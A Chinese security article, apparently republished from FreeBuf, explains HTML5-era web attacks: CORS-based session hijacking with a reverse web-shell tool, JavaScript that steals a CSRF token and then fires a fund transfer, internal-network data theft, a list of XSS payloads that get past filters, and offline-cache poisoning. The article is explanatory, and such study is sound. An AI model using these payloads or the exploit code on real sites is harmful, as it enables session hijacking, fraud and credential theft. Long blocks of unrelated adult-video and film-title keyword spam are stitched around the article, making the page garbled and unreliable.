国产精品电影_久久视频免费_欧美日韩国产激情_成年人视频免费在线播放_日本久久亚洲电影_久久都是精品_66av99_九色精品美女在线_蜜臀a∨国产成人精品_冲田杏梨av在线_欧美精品在线一区二区三区_麻豆mv在线看

揭密HTML5帶來的攻擊手法

安全 應用安全
本文詳細介紹了HTML5的普及,帶來的新的安全威脅。

HTML5 是下一代的HTML,HTML5賦予網頁更好的意義和結構。更加豐富的標簽將隨著對RDFa的,微數據與微格式等方面的支持,構建對程序、對用戶都更有價值的數據驅動的Web。基于HTML5開發的網頁APP擁有更短的啟動時間,更快的聯網速度。本文詳細介紹了HTML5的普及,帶來的新的安全威脅。

揭密HTML5帶來的攻擊手法 

一、CORS(Cross-Origin Resource Sharing) 跨域資源共享

為了構建高品質的網站,以及滿足日益增長的用戶需求,HTML5針對SOP(同源策略)放寬了一些限制,簡單的說,同源策略允許來自同一站點的頁面訪問其頁面的方法和屬性等,但限制了跨域調用其他頁面的方法和屬性。現在HTML5放寬了這些限制,XMLHttpRequest Level 2新增了功能CORS協議,允許Ajax發起跨域的請求,瀏覽器是可以發起跨域請求的,比如你可以外鏈一個外域的圖片或者腳本。但是Javascript腳本是不能獲取這些資源的內容的,它只能被瀏覽器執行或渲染。

COR是頁面層次的控制模式。每一個頁面需要返回一個名為‘Access-Control-Allow-Origin’的HTTP頭來允許外域的站點訪問。你可以僅僅暴露有限的資源和有限的外域站點訪問。在COR模式中,訪問控制的職責可以放到頁面開發者的手中,而不是服務器管理員。當然頁面開發者需要寫專門的處理代碼來允許被外域訪問。

所以只要b.com允許,a.com可以使用ajax獲取A上任意數據,國外安全研究者Lava Kumar開發了一款工具“Shell of the future”。

Shell of the Future 是一個反向Web Shell處理工具(Reverse Web Shell handler)。利用跨站腳本攻擊或瀏覽器地址欄注入javascript以后,Shell of the Future可進行劫持會話。 它利用了HTML5支持的Cross Origin Requests,可以繞過一些反會話劫持的方法,如HTTP-Only限制的cookie,幫定IP地址的會話ID。

下載地址

如何使用該工具:

1、下載并解壓該工具,雙擊“Shell of the Future.exe”,會彈出一個窗口。

揭密HTML5帶來的攻擊手法

 

2、輸入任意端口,點擊“Start”。

3、使用瀏覽器訪問http://127.0.0.1:8008/sotf.console (firefox效果最佳)

4、不出問題,你將看到以下畫面。(Shell of the Future有兩個JavaScript的exp- e1.js和e2.js,我們可以利用XSS漏洞將其嵌入到受害者的瀏覽器)

揭密HTML5帶來的攻擊手法

 

5、當一個用戶登錄下面的測試網站:

http://www.testfire.net/bank/login.aspx (admin/admin)

該站點的搜索功能粗在一個XSS漏洞,http://www.testfire.net/search.aspx?txtSearch=%3Cscript%3Ealert%2812%29%3C%2Fscript%3E

6、攻擊者發送一個惡意鏈接給用戶,如下:

http://www.testfire.net/search.aspx?txtSearch=%3Cscript%20src=%22http://127.0.0.1:8008/e1.js%22%3E%3C/script%3E

7、當用戶點擊之后,攻擊者的IP地址將會發送給攻擊者,然后點擊“Hijack Session”:

揭密HTML5帶來的攻擊手法 

8、點擊Hijack Session之后,將出現如下畫面:

揭密HTML5帶來的攻擊手法 #p#

二、竊取CSRF令牌(token)

目前很多互聯網站點都在使用token來防御CSRF攻擊,但是隨著HTML5技術的普及,攻擊者很有可能竊取到CSRF的token,如果CSRF token的請求URL(GET請求),利用前面提到的CORS協議,攻擊者可以注入一個CSRF payload跨域請求到目標站點上。當然,利用的話需要服務端添加一個HTTP 頭字段“origin”,并且需要設置該屬性withCredentials為true,讓我們來看看如何利用:

1、某用戶登錄www.bank.com。

2、假設該站點有CSRF保護,即在表單提交的地方添加了隱藏的token,然后發送GET請求到服務端進行驗證,如下:

揭密HTML5帶來的攻擊手法

3、攻擊者通過email、IM聊天工具或其他方式發送一個惡意站點ww.attackersite.com4、攻擊者可以提交一個Ajax請求到www.bank.com并且執行一些操作,但是需要知道CSRF的token值。5、所以攻擊者需要竊取到token令牌,然后進行CSRF攻擊。

6、攻擊者編寫了下面的一段代碼,發送Ajax請求到ConfirmTransfer.jsp頁面并接受其響應,在返回的數據包中搜索csrfToken,找到后,另外一個Ajax請求被發送,其中包含了CSRF token。

<!DOCTYPE html><html><head><script>function testing(){var xmlhttp;if (window.XMLHttpRequest)
  {
  xmlhttp=new XMLHttpRequest();
  }else
  {
  xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");
  }
xmlhttp.open("GET","http://bank/Myapp/ConfirmTransfer.jsp",false);
xmlhttp.send();if(xmlhttp.status==200){var str=xmlhttp.responseText;var n=str.search("csrfToken");var final=str.substring(n+18,n+28);var url = 
"http://bank/Myapp/TransferFund.jsp?datum1%2F=06-06-2013&amp;
Account=1234&amp;csrfToken=" + escape(final);
xmlhttp.open("GET", url, true);
xmlhttp.send();}}</script></head><body onload="testing();"></body></html>

以上的一切操作全在后臺進行,用戶完全不知情,因此,在HTML5中,攻擊者完全可能獲取到CSRF TOKEN和執行一些操作。#p#

三、訪問內部服務器:

很多互聯網公司除了有ONLINE對外的業務之外,在內部也用著很多的應用,如財務管理系統、員工管理系統以及其他的一些內部社區等,很多開發者為了各個應用之間調用簡潔方便,在很多應用中都添加了以下頭:

Control-Allow-Origin: *

攻擊者可以利用社會工程學,讓內部用戶點擊一個鏈接,然后攻擊者就可以訪問到內部的一些資源,以下為操作步驟:

1、員工登錄到內部的某應用,如www.internalurl.com

2、internalurl服務器返回的響應頭設置了Access-Control-Allow-Origin: *(允許任何域發起的請求都可以獲取當前服務器的數據。)

3、員工受到一封郵件,點擊了鏈接 – www.malicioussite.com

4、這個站點包含了正常的UI內容,所以員工一般不會察覺,但是,該頁面包含了一段javascript代碼。

5、該javascript代碼會發送一個XMLHttpRequest請求。

6、分析返回的數據包,并把它發送到攻擊者的服務器。

7、攻擊者獲取到公司內部站點的相關信息。#p#

四、HTML5新的XSS攻擊載體

直到現在,還有很多開發者總喜歡開發自己定義的XSS黑名單過濾器,以阻止XSS攻擊,包含了大多網絡上常見的XSS利用的代碼,如img、script等,HTML5中引入了很多新的標簽屬性,如audio和vedio標簽,新的標簽帶來了新的事件,會繞過現有的過濾器,以下為收集的HTML5存在跨站的標簽:

<video> <source onerror=”javascript:alert(1)”><video onerror=”javascript:alert(1)”><source><audio onerror=”javascript:alert(1)”><source><input autofocus onfocus=alert(1)><select autofocus onfocus=alert(1)><textarea autofocus onfocus=alert(1)><keygen autofocus onfocus=alert(1)><button form=test onformchange=alert(2)>X
<form><button formaction=”javascript:alert(1)”

五、離線Web應用緩存中毒:

大部分瀏覽器都支持HTML離線緩存技術,如Google Chrome, Mozilla, Opera以及Safari,在給用戶帶來便捷的同時,也引發了一些列的安全威脅,如很有可能遭受“緩存中毒”的攻擊。如果攻擊者在網站上嵌入特定的JS文件,能夠控制用戶的賬戶。HTML5提供了manifest功能,它是html5提供的離線web應用解決方案,它的作用有兩個:

1. 連網情況下,訪問使用manifest的頁面時(之前曾經訪問過),會先加載一個manifest文件,如果這個manifest文件沒有改變,頁面相關的資源便都來自瀏覽器的離線緩存,不會再有額為的網絡請求,從而大大提高頁面相應時間

2. 斷網時,在瀏覽器地址欄輸入頁面url,仍然能夠正常顯示頁面,以及正常使用不依賴ajax的功能

利用這個功能,攻擊者可以竊取用戶的憑據,利用方法如下:

1、某黑木耳在星巴克鏈接到了一個不安全的WI-FI網絡環境。(攻擊者打造)

2、該黑木耳登錄新浪微博,攻擊者可劫持。

3、攻擊者設置該網站返回一個頁面,該頁面包含了一個隱藏的iframe,提示新浪微博登陸。

4、由于該網絡是由攻擊者控制,所以他提供的新浪微博登陸頁面中包含了manifest屬性,除了可以當場劫持到黑木耳的微博帳號密碼之外,后面還可以長期劫持。

5、當黑木耳喝完老干媽牌拿鐵之后,拿著心愛的神舟牌筆記本回家之后,想繼續曬自己的照片,繼續登錄微博。

6、瀏覽器會從緩存中載入偽造的登錄頁面。

7、帳號密碼隨后會發送到攻擊者。

因此,通過manifest屬性可以竊取用戶的憑據,以上都是一些已經研究出來的攻擊手法,相信隨著HTML5的高度發展,未來幾年內會出現更多的攻擊手法。

原文地址:http://resources.infosecinstitute.com/demystifying-html-5-attacks/

責任編輯:藍雨淚 來源: FreebuF
相關推薦

2013-09-11 10:57:58

HTML5

2012-07-26 10:40:38

HTML5

2010-08-11 09:43:54

FlexHTML5

2012-06-05 10:48:23

2012-09-21 10:01:56

HTML5JS資訊

2012-05-21 10:05:10

HTML5

2013-01-24 10:26:04

HTML5HTML 5HTML5的未來

2014-08-26 10:54:20

2011-05-13 17:36:05

HTML

2013-01-04 13:39:51

2013-01-04 13:30:04

2013-01-04 11:22:12

2013-01-04 11:40:54

2023-03-16 09:00:00

HTML5HTML語言

2019-05-13 10:42:53

2011-12-08 10:59:07

2010-08-30 11:55:28

2013-01-04 11:38:35

2013-10-21 15:24:49

html5游戲

2013-01-04 13:14:22

點贊
收藏

51CTO技術棧公眾號

免费国产亚洲视频| 亚洲成av人片在线观看无码| 国产日韩精品综合网站| 亚洲一二三四| 在线精品视频小说1| 电影天堂最新网址| 国产日韩欧美综合在线| 亚洲色欲久久久综合网东京热| 久久综合伊人| 久久久福利视频| 国产精品啊啊啊| 成人免费福利在线| 日韩成人精品一区| 国产精品吴梦梦| 日韩av久操| 成人免费xxxxx在线观看| 国产剧情在线观看一区| 91产国在线观看动作片喷水| 一区二区三区在线免费看 | 日韩电影中文字幕| 51漫画成人app入口| 亚洲国产小视频| а√在线中文在线新版| 亚洲精品国产拍免费91在线| 乱馆动漫1~6集在线观看| 欧美v国产在线一区二区三区| 麻豆网站在线观看| 精品国产露脸精彩对白| 日韩电影毛片| 色哟哟入口国产精品| 欧美特黄aaaaaaaa大片| 亚洲精品国精品久久99热| f2c人成在线观看免费视频| 欧美成人a在线| 女人让男人操自己视频在线观看 | 国产一级视频| 亚洲va欧美va人人爽| 视频二区在线| 在线观看欧美黄色| 国精一区二区三区| 日韩中文字幕av| 精品国产三区在线| 日本乱人伦a精品| 欧美日韩午夜| 一区二区三区免费看| 91丝袜高跟美女视频| 黄网在线播放| 7777精品久久久大香线蕉| 国产网站在线| 欧美激情小视频| 久久精品国产www456c0m| 久久天堂国产精品| 成人av午夜影院| 中文在线天堂网| 欧美岛国在线观看| 国产精品xnxxcom| 成人国产精品久久久| 久久狠狠婷婷| 国产精品一区二区免费在线观看| 中文字幕在线不卡国产视频| 在线播放免费| 亚洲国产美女精品久久久久∴| 欧美日韩午夜电影网| 亚洲最大福利视频网| 国产综合久久久久影院| 久草一本av| 日韩av影视在线| 欧美男gay| 四虎永久免费网站| 一区二区三区日本| 制服丝袜专区在线| 91丨九色丨国产在线| 国产成人午夜视频| 欧美xxx.com| 欧美大尺度在线观看| 亚洲欧美日韩视频二区| jizz18女人| 亚洲美女中文字幕| 国产精品99免费看| 91极品视频在线观看| 精品国产乱码久久久久久闺蜜| 免费av一区二区三区四区| 中文字幕人成一区| 福利视频第一区| 深夜福利一区二区三区| 日本午夜精品一区二区三区| 色影院视频在线| 日本欧美中文字幕| 91精品秘密在线观看| 在线看日本不卡| 999精品视频在线观看| 91亚洲精品丁香在线观看| 成人av网站在线观看免费| 嫩草在线播放| 欧美激情网友自拍| 国产一区二区三区在线观看精品| 青青草视频在线免费观看| 欧美xxxx18性欧美| 日本不卡的三区四区五区| 久草电影在线| 欧美大片网站在线观看| 久久久成人网| 在线香蕉视频| 免费91在线视频| 国产一区在线看| 男人资源在线播放| 国产精品香蕉av| 国产精品高潮呻吟| 中文另类视频| 欧美日韩一级在线| 欧美一级片免费看| 亚洲福利专区| 免费在线性爱视频| 成人激情视频在线播放| 亚洲免费观看高清完整版在线观看熊 | 日韩精品在线观看网站| 日韩亚洲国产精品| 欧美美乳在线| 国产又爽又黄的激情精品视频| 欧美激情综合网| 24小时成人在线视频| 91xxx视频| 亚洲第一网站男人都懂| 久久精品女人天堂| 日本乱理伦在线| 日韩免费三级| 亚洲精品国产精品自产a区红杏吧 亚洲精品国产精品乱码不99按摩 亚洲精品国产精品久久清纯直播 亚洲精品国产精品国自产在线 | 国产精品一品视频| sis001亚洲原创区| 日韩欧美精品在线不卡| 欧美午夜影院一区| 亚洲国产清纯| v片在线观看| 欧美亚洲精品日韩| 精品国产乱码久久久久久浪潮| 亚洲欧美久久久| 国产偷倩在线播放| 亚洲欧美一二三| 中文字幕日韩视频| 久久久久久久久久电影| 999国产精品一区| 久草在线资源网站| 国产精品免费观看在线| 欧美特级www| 亚洲伦伦在线| 菠萝菠萝蜜在线视频免费观看| 视频一区国产精品| 亚洲男人的天堂在线| 亚洲国产成人在线播放| 欧美三级免费| 在线手机中文字幕| 黄色网页在线观看| 最近2018年手机中文在线| 久久手机在线视频| 福利视频免费在线观看| 精品嫩模一区二区三区| 亚洲午夜精品一区二区| 精品国产综合| 日韩精品久久久毛片一区二区| 欧美一区二区三区红桃小说| 国产区亚洲区欧美区| 777精品视频| 欧美亚洲激情视频| 国产精品久久久久久久7电影| 久久男人资源视频| 国产精品久久久久久久午夜| 国产精品成人免费电影| 国产一区二区在线网站| 欧美国产视频一区| wwwxxx在线观看| 最新中文字幕av专区| 欧美最新精品| 九九99久久精品在免费线bt| 国内成人精品| 亚洲精选av在线| 国产91一区二区三区| 日韩欧美国产一区在线观看| 国产精品一区二区三区网站| 天堂av一区| 欧美性孕妇孕交| 在线视频一区观看| 九九热在线精品视频| 亚洲成人av一区二区| 日韩va欧美va亚洲va久久| 国产激情综合| 免费动漫网站在线观看| 日本一区网站| 久久久久久久电影一区| 在线亚洲人成电影网站色www| 国产一区二区在线视频| 红杏成人性视频免费看| a视频网址在线观看| 精品国偷自产一区二区三区| 国产精品成人一区| 精品一区二区三区四区在线| 亚洲激情成人在线| 狠狠狠色丁香婷婷综合久久五月| 亚洲瘦老头同性70tv| av资源在线播放| 在线免费av网址|